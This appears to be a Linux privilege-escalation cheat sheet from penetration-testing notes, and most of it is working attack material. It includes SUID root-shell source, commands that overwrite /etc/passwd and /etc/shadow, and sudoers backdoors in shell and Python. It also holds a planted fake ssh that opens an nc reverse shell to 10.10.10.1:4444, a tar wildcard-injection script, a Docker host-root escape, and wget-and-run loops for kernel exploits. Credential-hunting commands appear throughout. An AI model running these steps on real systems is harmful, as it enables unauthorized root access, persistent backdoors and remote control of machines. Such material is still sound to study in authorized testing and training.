Linux

Once you've found the path to escalation, see:
https://github.com/Ignitetechnologies/Privilege-Escalation

Linux Privilege Escalation Examples

https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/privilege-escalation/linux/linux-examples.rst

MindMap

Useful commands to run

https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List

Things to look for

    Misconfigured services (cron jobs)
      any running as a privileged user?
    Incorrect file permissions (exportfs, sudo)
    Misconfigured environment ($PATH)
    Binaries with the SUID bit set
    Software or OS with known vulnerabilities
    Membership of the docker group

SUDO

Read http://touhidshaikh.com/blog/?p=790

Can you su to root without a password?

su root

If you get the error "su: must be run from a terminal", upgrade to a full TTY first (for example by spawning one with python's pty module) and retry.

Reading sudoers entries:

root ALL=(ALL) ALL
The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.

jelly ALL= /sbin/poweroff
The user jelly can, from any terminal, run the command poweroff using jelly's own password.

jelly ALL = (root) NOPASSWD: /usr/bin/find
The user jelly can, from any terminal, run find as root without a password (find can run arbitrary commands through -exec, so this is a direct root shell).
Are you a sudo user already? Do you have access to powerful commands like chown or chmod?
sudo su -

Are you part of the sudo group, but not listed in the sudoers file? polkit normally treats the sudo (Debian/Ubuntu) or wheel (RHEL/Fedora) group as administrators, so pkexec can give a root shell with your own password:
id # look for 27(sudo)
pkexec sh

What can we run with sudo?
sudo -l

Try su as every user, with the username as the password.

User bash history:
cat ~/.bash_history; cat ~/.nano_history; cat ~/.atftp_history; cat ~/.mysql_history; cat ~/.php_history

Spawning root shells

Copy /bin/bash or /bin/sh to a file called rootbash, make sure it is owned by root and has the SUID bit set (chmod +s), then run it as ./rootbash -p. The -p flag matters: without it bash notices the effective UID differs from the real UID and drops the privilege.

Questions to ask yourself

What user with what permissions + where am I?

id
pwd

What usernames could I login as?

grep -vE "nologin|false" /etc/passwd

What architecture?

uname -m

Whats running on the machine?

ps aux
Look for anything running that is not standard.

What files does the user have permission?

find / -user $USER 2>/dev/null
find / -name "*$USER*" 2>/dev/null # looks for files with the username in the name

What services are running?

netstat -antup
If something listens here that was not in the nmap scan, a firewall rule may be blocking it. Is mysql in there? If so, credentials will be stored somewhere on the box.

What is installed?

dpkg -l | awk '$1 ~ /ii/{print $2,$3}'
rpm -qa
# copy the output over to kali and run /scripts/linux/pkg_lookup.sh to find a vulnerable version, or do the below

Run on target

FILE="packages.txt"; FILEPATH="/tmp/$FILE"
if /usr/bin/rpm -q -f /usr/bin/rpm >/dev/null 2>&1; then
    # RPM based: one "name version" per line
    rpm -qa --qf "%{NAME} %{VERSION}\n" | sort -u > "$FILEPATH"
else
    # dpkg based: installed (ii) packages only
    dpkg -l | grep '^ii' | awk '{print $2 " " $3}' > "$FILEPATH"
fi
echo "kernel $(uname -r)" >> "$FILEPATH"
echo; echo "[>] Done. Transfer $FILEPATH to your computer and run:"; echo
echo "./packages_compare.sh /path/to/$FILE"; echo
Copy /tmp/packages.txt, which it has created, back to your machine, then download
https://raw.githubusercontent.com/rowbot1/burmatscripts/master/bash/vuln_pkg_lookup.sh
and run:
./vuln_pkg_lookup.sh packages.txt
# Common locations for user installed software
/usr/local/
/usr/local/src
/usr/local/bin
/opt/
/home
/var/
/usr/src/

# Debian
dpkg -l

# CentOS, openSUSE, Fedora, RHEL
rpm -qa

# OpenBSD, FreeBSD
pkg_info

What kernel version - low hanging fruit?

uname -a

What web app creds can i find?

find . -iname '*config*' 2>/dev/null
Research where credentials are stored for the specific web application (its config file, not a file literally named config).

Can you see the shadow file - get lucky?

cat /etc/shadow
What services are running as root?
ps aux | grep root
Look for vulnerable/privileged components such as: mysql, sudo, udev, python.
If /etc/exports is writable, you can add an NFS export (or edit an existing one) with the no_root_squash flag on a directory, mount it from your attacking machine as root, drop a root-owned SUID binary into it, and run that binary on the target to get root.

Some programs that can be used to spawn a shell (useful when one of them runs via sudo or SUID):

nmap
vim
less
more

Docker

Are you in the docker group?
id
# uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),999(docker)

Get an image name with docker images (docker ps only shows running containers), then mount the host root filesystem into a container and chroot into it:
docker run -v /:/mnt --rm -it $imagenamehere chroot /mnt sh
This gives you a root shell on the host filesystem.

Cron Jobs

What jobs are scheduled?

crontab -l 2>/dev/null
ls -alh /var/spool/cron 2>/dev/null
ls -al /etc/ | grep cron 2>/dev/null
ls -al /etc/cron* 2>/dev/null
cat /etc/cron* 2>/dev/null
cat /etc/at.allow 2>/dev/null
cat /etc/at.deny 2>/dev/null
cat /etc/cron.allow 2>/dev/null
cat /etc/cron.deny 2>/dev/null
cat /etc/crontab 2>/dev/null
cat /etc/anacrontab 2>/dev/null
cat /var/spool/cron/crontabs/root 2>/dev/null

If there is a cron job that runs as root but the script it runs (or a directory it reads from) is writable by you, change it to create your SUID binary and get a shell.
The following command lists processes running as root, the permissions of their binaries, and NFS exports:
echo 'services running as root'; ps aux | grep root; echo 'permissions'; ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null

Use netstat to find other machines connected:
netstat -ano

Confidential information and users

id
su
sudo -l
cat /etc/passwd
cat /etc/shadow
cat /etc/group
cat /etc/sudoers # who is in there, are you?
ls -alh /var/mail/
ls -ahlR /root
ls -ahlR /home/

grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 {print $1}' # any other super users?

Find interesting files and directories fast

find / -name "*.txt" 2> >(grep -v 'Permission denied' >&2)
grep -R -i "password" / 2> >(grep -v 'Permission denied' >&2)

File Write

If you can write to any of these files or directories you have a good chance of PE:
~/.ssh/authorized_keys
/var/www/html
/var/spool/cron/crontabs/$user
/etc/crontab
/etc/cron.*
$PATH directories or libraries (e.g. .py modules imported by a root script)
/etc/systemd/system
/etc/init.d
/etc/sudoers

If you have found an interesting SUID binary, download it to your box and open it in Ghidra. Check the main function to view the decompiled commands it runs.

Things to remember:
    Run strings on the binary. Read all of it, don't just read the bottom of the output - read the top too. Look for programs that the binary calls, like curl. If you spot one that is not called with its full path, you can exploit it by modifying PATH and creating a file of that name containing /bin/bash. See the box Symfonos:1.
    A SUID file runs with the owner's effective UID no matter who executes it. So if root owns it, we can run it and hijack it to become root.
ltrace ./binary
# stepping through the binary's library calls may reveal the password if one is needed to run it

Capabilities

Linux capabilities split the privileges of root into smaller, distinct units that can be granted to a process (or, as file capabilities, to a binary) independently, so a program needs less than full root and the damage from a compromise is reduced. For the attacker, a dangerous file capability on a binary you can run can be as good as a SUID bit.
https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities

Capability name - Description
CAP_AUDIT_CONTROL - Enable/disable kernel auditing
CAP_AUDIT_WRITE - Write records to the kernel audit log
CAP_BLOCK_SUSPEND - Block system suspend
CAP_CHOWN - Make arbitrary changes to file UIDs and GIDs (full filesystem access)
CAP_DAC_OVERRIDE - Bypass file read, write and execute permission checks (full filesystem access)
CAP_DAC_READ_SEARCH - Bypass file read and directory read/execute permission checks only (enough to read /etc/shadow)
CAP_FOWNER - Bypass permission checks on operations that normally require the process's filesystem UID to match the file's UID
CAP_KILL - Send signals to processes belonging to other users
CAP_SETGID - Change the GID
CAP_SETUID - Change the UID (set the UID of your process to root)
CAP_SETPCAP - Transfer and remove capabilities to/from any PID
CAP_IPC_LOCK - Lock memory
CAP_MAC_ADMIN - MAC configuration or state changes
CAP_NET_RAW - Use RAW and PACKET sockets
CAP_NET_BIND_SERVICE - Bind a socket to Internet domain privileged ports
CAP_SYS_CHROOT - Call chroot()
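As an added example (not part of the original page or of the HackTricks write-up linked above), the shell snippet below turns the table into a check: it parses getcap output in both the older "path = cap+ep" and the newer "path cap=ep" formats and prints only the capabilities that hand you root-equivalent access. The sample lines and the DANGEROUS_CAPS list are my own constructions; on a target, pipe the real output of getcap -r / 2>/dev/null into flag_dangerous_caps instead.

```shell
#!/bin/sh
# Added example: triage getcap output for capabilities that give a direct
# path to root. Input below is a constructed sample, not from a real host;
# on a target run:  getcap -r / 2>/dev/null | flag_dangerous_caps

# Capabilities that are effectively root when you can run the binary that
# holds them: setuid/setgid -> become uid 0, dac_* / chown / fowner -> read
# or write any file, sys_admin / sys_module / sys_ptrace -> kernel or
# process takeover. (My selection, not an official list.)
DANGEROUS_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_chown cap_fowner cap_sys_admin cap_sys_module cap_sys_ptrace"

# Constructed sample in both getcap output styles:
#   older libcap: "/path = cap_x+ep"     newer libcap: "/path cap_x=ep"
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/sbin/arping cap_net_raw=ep
/usr/bin/tar cap_dac_read_search=ep
/usr/bin/perl = cap_setuid,cap_setgid+eip'

# Print "<path> <cap1,cap2,...>" for one getcap line, whichever format it uses.
parse_getcap_line() {
    line=$1
    case "$line" in
        *" = "*) path=${line%% = *}; caps=${line#* = }; caps=${caps%%+*} ;;
        *)       path=${line%% *};   caps=${line#* };   caps=${caps%%=*} ;;
    esac
    printf '%s %s\n' "$path" "$caps"
}

# Read getcap output on stdin; print one "<path> <cap>" line per dangerous cap.
flag_dangerous_caps() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        parsed=$(parse_getcap_line "$line")
        path=${parsed%% *}
        caps=${parsed#* }
        for cap in $(printf '%s' "$caps" | tr ',' ' '); do
            case " $DANGEROUS_CAPS " in
                *" $cap "*) printf '%s %s\n' "$path" "$cap" ;;
            esac
        done
    done
}

# Number of dangerous findings in the sample (4: python3.8, tar, perl x2).
count_sample_findings() {
    printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps | grep -c .
}

printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps
```

Anything this prints is worth a look on GTFOBins-style lines: python with cap_setuid is a one-liner to a root shell, and tar with cap_dac_read_search reads /etc/shadow regardless of file permissions.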

World-writable folders

find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o=w -type d 2>/dev/null

World-executable folders

find / -perm -o=x -type d 2>/dev/null

World-writable & executable folders

find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null

gives a bit more info (world-writable directories, skipping your home, not involving root)

find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root

World-writable directories involving root

find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root

Look for binaries with the SUID or SGID bits set.

find / -maxdepth 6 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
find / -perm -1000 -type d 2>/dev/null   # sticky-bit directories (not SUID), listed here for completeness
find / -perm -g=s -type f 2>/dev/null    # SGID files
find / -user root -perm -4000 -print 2>/dev/null
In plain English, this command says to find files in the / directory owned by the user root with SUID permission bits (-perm -4000), print them, and then redirect all errors (2 = stderr) to /dev/null (where they get thrown away). The reason for this redirect is that we aren't interested in things that we can't access, and access denied errors can fill up a terminal pretty fast.
If a SUID binary calls another program without its fully qualified path, put your own program of that name in a directory earlier in PATH to hijack it. On older bash versions (before 4.2-048) you can even hijack a fully qualified call, because bash allowed exported functions whose names look like paths:
function /usr/bin/foo () { /usr/bin/echo "It works"; }
export -f /usr/bin/foo
/usr/bin/foo
# prints: It works
If you can get root to execute anything, the following will change a binary's owner to root and set the SUID bit:
chown root:root /tmp/setuid; chmod 4777 /tmp/setuid
# look for the string password in files under the current directory
grep -rwl "password" .

/etc/shadow overwrite

If a SUID binary or root-run script lets you write to arbitrary files, replace root's line in /etc/shadow with the following, then su to root using the password rowbot:
root:$6$saltsalt$zjiFtiGFBUkyU86/TTUE1Dgg6ZNem6QUdhcVVRsjLXvWGjCm90F/2.PDpGOfGCspP0/j6a6YLlImSqQZIUmqc.:18294:0:99999:7:::

Check running services and installed applications

ps -ef; cat /etc/services; dpkg -l; rpm -qa
An example: you see a local database like mysql running. Maybe you can find credentials for it and log into it locally on the box.
If MySQL is running as root and you have database root access, the sys_exec() function from the lib_mysqludf_sys UDF (you have to load it yourself; it is not built in, see the link below) runs OS commands as the mysql process user. For instance, to add a user to the admin group:
ps aux | grep root | grep mysql
sys_exec('usermod -a -G admin username')
More about MySQL:
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
Command to skip ignored lines in config files
alias nonempty="grep -Ev '^[ \t]*#|^$'"
Find Linux distribution & version
cat /etc/issue; cat /etc/*-release; cat /etc/lsb-release; cat /etc/redhat-release;
Check versions - use in conjunction with searchsploit
dpkg -l
rpm -qa
httpd -v
mysql --version
python --version
ruby -v

Architecture

cat /etc/*release
uname -m

Environment variables

cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set
Find printers
lpstat -a

Find apps installed;

ls -alh /usr/bin/; ls -alh /sbin/; dpkg -l; rpm -qa; ls -alh /var/cache/apt/archives; ls -alh /var/cache/yum/*;

Find writable configuration files

find /etc/ -writable -type f 2>/dev/null

Misconfigured services

cat /etc/syslog.conf; cat /etc/chttp.conf; cat /etc/lighttpd.conf; cat /etc/cups/cupsd.conf; cat /etc/inetd.conf; cat /etc/apache2/apache2.conf; cat /etc/my.conf; cat /etc/httpd/conf/httpd.conf; cat /opt/lampp/etc/httpd.conf; ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

Scheduled jobs

crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron*; cat /etc/cron*; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny

Grep hardcoded passwords

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'   # single quotes so the shell does not expand $password

if web server run in web root:

grep "localhost" ./ -R

Network configuration

/sbin/ifconfig -a; cat /etc/network/interfaces; cat /etc/sysconfig/network; cat /etc/resolv.conf; cat /etc/networks; iptables -L; hostname; dnsdomainname
List other users home directories
ls -ahlR /root/; ls -ahlR /home/
User mails
cat ~/.bashrc; cat ~/.profile; cat /var/mail/root; cat /var/spool/mail/root
Find interesting binaries
find / -name wget 2>/dev/null; find / -name nc* 2>/dev/null; find / -name netcat* 2>/dev/null; find / -name tftp* 2>/dev/null; find / -name ftp 2>/dev/null

Mounted filesystems

mount; df -h; cat /etc/fstab

If you can change PATH (for a root cron job or a SUID binary that calls ssh by bare name), the following plants a poisoned ssh binary that opens a reverse shell to 10.10.10.1:4444. Use export, not set: in bash "set PATH=..." only sets a positional parameter.
export PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" > /tmp/ssh
chmod +x /tmp/ssh

Ippsec demoing $PATH privilege escalation:
https://www.youtube.com/watch?v=3VxZNflJqsw
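The PATH hijack described above and in the SUID section, as an added example that is not from the page: a stand-in "victim" script calls ssh by bare name (the same mistake a SUID binary makes when it does system("ssh ...")), and a directory we control, prepended to PATH, supplies a fake ssh. Everything lives under a temporary directory, so it runs without root and touches nothing on the host. The second function is the enumeration side: it lists the PATH entries an attacker could write to. Names, paths and the fake payload are my own choices; a real payload would be the mkfifo reverse shell above.

```shell
#!/bin/sh
# Added example: PATH hijack of a program called without its full path,
# plus a check for PATH entries an unprivileged user can write to.

# Victim: calls "ssh" by bare name, exactly the mistake being exploited.
# (Stand-in for a SUID binary or root cron job; it runs as the caller here.)
make_victim() {
    cat > "$1" <<'EOF'
#!/bin/sh
ssh -V 2>&1 | head -n1
EOF
    chmod +x "$1"
}

# Attacker: a fake "ssh" in a directory we control. It only reports that it
# ran; the page's mkfifo one-liner would go here for a reverse shell.
make_fake_ssh() {
    cat > "$1/ssh" <<'EOF'
#!/bin/sh
echo "hijacked: running as uid $(id -u)"
EOF
    chmod +x "$1/ssh"
}

# Run the victim with our directory first in PATH; print what it output.
run_hijack() {
    work=$(mktemp -d)
    mkdir "$work/evil"
    make_victim "$work/victim"
    make_fake_ssh "$work/evil"
    result=$(PATH="$work/evil:$PATH" "$work/victim")
    rm -rf "$work"
    printf '%s\n' "$result"
}

# Enumeration side: print every PATH entry that is writable by the current
# user, and "cwd-in-path" for empty or "." entries (which mean the current
# directory, so any directory you can cd into becomes a hijack point).
insecure_path_entries() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r dir; do
        if [ -z "$dir" ] || [ "$dir" = "." ]; then
            echo "cwd-in-path"
        elif [ -d "$dir" ] && [ -w "$dir" ]; then
            echo "$dir"
        fi
    done
}

run_hijack
insecure_path_entries "$PATH"
```

On a real target, run insecure_path_entries against the PATH of the cron job or service (from /etc/crontab, the unit file, or /proc/PID/environ), not just your own shell's PATH, since that is the one the privileged process resolves commands with.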

Generating a SUID C shell for /bin/bash

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setuid(0);
    system("/bin/bash -p");
    return 0;
}
Compile using gcc -o <name> <filename.c>, then have root chown it and set the SUID bit (see below).

Without an interactive editor, write the same source with echo:
echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n\treturn 0;\n}' > setuid.c
If /etc/passwd is writable, you can get root by giving root an empty password or a password hash of your choosing. Note that ">" overwrites the whole file and wipes every other account; appending a new UID-0 user with ">>" is quieter.
echo 'root::0:0:root:/root:/bin/bash' > /etc/passwd; su
or
echo "root:JblITMXA7I1hg:0:0:root:/root:/bin/bash" > /etc/passwd
then su using the password rowbot

or generate your own hash:
openssl passwd
# enter the password; the output is the hash
# put it in the second (x) field of root's line in /etc/passwd
# su root using the password you set
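As an added example (not from the page), the snippet below does the openssl step above properly and adds the defender-side check the page mentions earlier ("any other super users?"): it hashes a password with openssl, builds a root-equivalent passwd line, appends it to a scratch copy of a constructed passwd file, and then lists every UID-0 account in that file. It never writes to the real /etc/passwd; the user name rowbot, the sample accounts and the scratch file are my own constructions. It assumes openssl is installed.

```shell
#!/bin/sh
# Added example: build a UID-0 /etc/passwd entry with a self-generated hash,
# and find extra UID-0 accounts. Works only on a scratch copy of passwd.

# Hash a password the way /etc/passwd and /etc/shadow expect. Prefers
# SHA-512 ($6$); older openssl without "-6" falls back to MD5 ($1$),
# which su also accepts.
hash_password() {
    h=$(openssl passwd -6 "$1" 2>/dev/null) || h=$(openssl passwd -1 "$1")
    printf '%s\n' "$h"
}

# "user:hash:0:0:comment:/root:/bin/bash" - UID 0 and GID 0 make this root,
# whatever the name is.
build_root_entry() {
    user=$1; pass=$2
    printf '%s:%s:0:0:added root:/root:/bin/bash\n' "$user" "$(hash_password "$pass")"
}

# Defender side: every account with UID 0 in a passwd file, comments skipped.
uid0_accounts() {
    grep -v '^#' "$1" | awk -F: '$3 == 0 {print $1}'
}

# Scratch demo on a constructed passwd copy (not a real system file):
# append a new root-equivalent user, then list UID-0 accounts.
demo() {
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
EOF
    build_root_entry rowbot rowbot >> "$tmp"
    uid0_accounts "$tmp" | tr '\n' ' '
    echo
    rm -f "$tmp"
}

demo
```

Putting the hash directly in the second field of passwd works because the x there only tells the system to consult /etc/shadow; a real hash in that field is used as-is. The same uid0_accounts check, run against the real /etc/passwd after an engagement, is how you spot the account you (or someone before you) left behind.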
Add user www-data to sudoers without a password (for example as the payload of a root cron job that runs a writable script such as /tmp/update):
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

If you can sudo chmod and chown, write the SUID shell source, compile it, then let sudo make it root-owned and SUID:
echo -e '#include <stdio.h>\n#include <stdlib.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n\treturn 0;\n}' > /tmp/setuid.c
gcc -o /tmp/setuid /tmp/setuid.c
sudo chown root:root /tmp/setuid; sudo chmod 4777 /tmp/setuid; /tmp/setuid
Wildcard injection: if a cron job runs a command with a shell wildcard (for example tar cf backup.tar * in a directory you can write to), you can create files in that directory whose names are command-line options; the shell expands the wildcard into those names and the program treats them as arguments. With tar, a file named --checkpoint-action=exec=... runs an arbitrary command as the cron user. For more info:
https://www.sans.org/reading-room/whitepapers/testing/attack-defend-linux-privilege-escalation-techniques-2016-37562
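The tar wildcard injection just described, as an added example that is not from the page or the SANS paper: stage_wildcard_payload drops the files an attacker would create in the directory the cron job archives, and simulate_cron_backup plays the vulnerable cron line. It all happens inside a temporary directory as the current user, so it runs without root and proves the mechanism rather than escalating anything. The file names and the marker-file payload are my own constructions; it assumes GNU tar, since --checkpoint-action is a GNU extension.

```shell
#!/bin/sh
# Added example: tar wildcard injection, run entirely inside a temporary
# directory. Needs GNU tar; nothing here requires root.

# Files whose *names* are tar options. When the cron job's shell expands "*"
# they land in tar's argv after the operands, and GNU tar still parses them
# as options (it does not stop option parsing at the first non-option).
stage_wildcard_payload() {
    dir=$1; marker=$2
    mkdir -p "$dir"
    printf '#!/bin/sh\ntouch "%s"\n' "$marker" > "$dir/shell.sh"
    chmod +x "$dir/shell.sh"
    touch "$dir/data.txt"                                 # an innocent file the job expects
    touch "$dir/--checkpoint=1"                           # fire a checkpoint after the first record...
    touch "$dir/--checkpoint-action=exec=sh shell.sh"     # ...and run our script at it
}

# The vulnerable cron line: cd into the directory and archive everything via a glob.
simulate_cron_backup() {
    dir=$1; out=$2
    (cd "$dir" && tar cf "$out" *) >/dev/null 2>&1
}

# Prints "yes" if the payload ran (marker file appeared), "no" otherwise.
wildcard_injection_fires() {
    work=$(mktemp -d)
    marker="$work/pwned"
    stage_wildcard_payload "$work/backups" "$marker"
    simulate_cron_backup "$work/backups" "$work/backup.tar"
    if [ -e "$marker" ]; then echo yes; else echo no; fi
    rm -rf "$work"
}

# Precondition check: is this GNU tar? (busybox/BSD tar lack --checkpoint-action)
has_gnu_tar() {
    tar --version 2>/dev/null | head -n1 | grep -q 'GNU tar'
}

wildcard_injection_fires
```

On a real target replace the touch in shell.sh with the rootbash copy from the "Spawning root shells" section (cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash) and wait for the cron run; the fix on the defender side is to quote or avoid globs in privileged jobs (tar cf backup.tar -- * or tar cf backup.tar .) so file names can never become options.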
If an old exploit fails to compile or link with a hash-style error, build it with:
gcc 9545.c -o 9545 -Wl,--hash-style=both
Find other users on the system:
id; who; w; last; cat /etc/passwd | cut -d: -f1; echo 'sudoers:'; cat /etc/sudoers; sudo -l
grep home /etc/passwd | cut -d: -f1

World readable/writable files:

echo "world-writeable folders"; find / -writable -type d 2>/dev/null; echo "world-writeable folders"; find / -perm -222 -type d 2>/dev/null; echo "world-writeable folders"; find / -perm -o=w -type d 2>/dev/null; echo "world-executable folders"; find / -perm -o=x -type d 2>/dev/null; echo "world-writeable & executable folders"; find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null;

World-writable directories without the sticky bit (anyone can delete or rename other users' files in them):
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print 2>/dev/null

Find files with no valid owner or group:
find / -xdev \( -nouser -o -nogroup \) -print 2>/dev/null
Add a user to sudoers in Python (for example as the payload of a writable .py that root runs):
#!/usr/bin/env python
import os
import sys
try:
    os.system('echo "username ALL=(ALL:ALL) ALL" >> /etc/sudoers')
except:
    sys.exit()
Ring0 kernel exploit for 2.4/2.6 kernels:
wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c; gcc 36038-6.c -m32 -o ring0; chmod +x ring0; ./ring0

Inspect web traffic

tcpdump -i eth0 tcp port 80 -w output.pcap

Scripts to run

Copy them over

Creates the folder /tmp/rowbot and copies the files served by the kali web server to the target (replace <kali-ip>):
wget -nd -np -R "index.html*" -P /tmp/rowbot --recursive http://<kali-ip>/
What is running, any cron jobs, any scripts? Use pspy to find out:
https://github.com/DominicBreuker/pspy

Useful script to run for an initial scan - displays info on the box:
wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/\r$//' bangenum.sh
./bangenum.sh

Use this tool first to help you get into the PE mindset:
https://github.com/diego-treitos/linux-smart-enumeration

SUID search - good tool

https://github.com/Anon-Exploiter/SUID3NUM
https://github.com/TH3xACE/SUDO_KILLER

Automatically downloads and compiles exploit

The following script runs exploit suggester and automatically downloads and executes suggested exploits:
wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py

USAGE: xploit_installer.py <exploit id>

Linux Remote Exploits

47: shellshock
48: heartbleed

Kernelpop

Automated kernel vulnerability enumeration and exploitation:
https://github.com/spencerdodd/kernelpop

Linux Local Exploits

49: linux-exploit-suggester
50: unix_privesc_check
51: kernel 2.4.x / 2.6.x (sock_sendpage 1)
52: kernel 2.4 / 2.6 (sock_sendpage 2)
53: kernel < 2.6.22 (ftruncate)
54: kernel < 2.6.34 (cap_sys_admin)
55: kernel 2.6.27 < 2.6.36 (compat)
56: kernel < 2.6.36-rc1 (can bcm)
57: kernel <= 2.6.36-rc8 (rds protocol)
58: *kernel < 2.6.36.2 (half nelson)
59: *kernel <= 2.6.37 (full nelson)
60: kernel 2.6 (udev)
61: kernel 3.13 (sgid)
62: kernel 3.13.0 < 3.19 (overlayfs 1)
63: kernel 3.14.5 (libfutex)
64: kernel 2.6.39 <= 3.2.2 (mempodipper)
65: *kernel 2.6.28 / 3.0 (alpha-omega)
66: kernel 2.6.22 < 3.9 (Dirty Cow)
67: kernel 3.7.6 (msr)
68: *kernel < 3.8.9 (perf_swevent_init)
69: kernel <= 4.3.3 (overlayfs 2)
70: kernel 4.3.3 (overlayfs 3)
71: kernel 4.4.0 (af_packet)
72: kernel 4.4.x (double-fdput)
73: kernel 4.4.0-21 (netfilter)
74: *kernel 4.4.1 (refcount)

wget http://www.securitysift.com/download/linuxprivchecker.py

Linux Kernel Exploits

Check the kernel version:
uname -r                    # kernel version
cat /proc/version           # kernel version via a special /proc file
hostnamectl | grep Kernel   # on systemd based distros: hostname and running kernel
Then search for it on this page:
https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md

Unix Priv checker

wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh

Other scripts:
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

LinEnum

Remember to run them again if you get a user shell, not just a www-data shell.
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
./LinEnum.sh -t -r report.txt

Linux Exploit Suggesters

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
wget https://raw.githubusercontent.com/PenturaLabs/Linux_Exploit_Suggester/master/Linux_Exploit_Suggester.pl
wget https://www.rebootuser.com/?p=1758

Exploits worth running

Always be sure to read the comments in exploits: they tell you which systems and versions are vulnerable, which parts of the script need modification, and which compilation flags to use. Is $targetip 32 bit or 64 bit? Be mindful of this when compiling exploits.

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation

https://www.exploit-db.com/exploits/37292

CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8

https://www.exploit-db.com/exploits/15285/

Linux Kernel <= 2.6.37 'Full-Nelson.c'

https://www.exploit-db.com/exploits/15704/

CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)

https://git.zx2c4.com/CVE-2012-0056/about/

Linux CVE 2012-0056

wget -O exploit.c http://www.exploit-db.com/download/18411
gcc -o mempodipper exploit.c
./mempodipper

CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8

https://dirtycow.ninja/

Compile dirty cow:

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

Cross compiling exploits

gcc -m32 -o output32 hello.c # (32 bit)
gcc -m64 -o output hello.c   # (64 bit)

Linux 2.6.32

https://www.exploit-db.com/exploits/15285/

Elevation in 2.6.x:

# serve the pre-compiled exploits from your machine on port 8000, then on the target:
for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611 ; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done

Get proof

echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "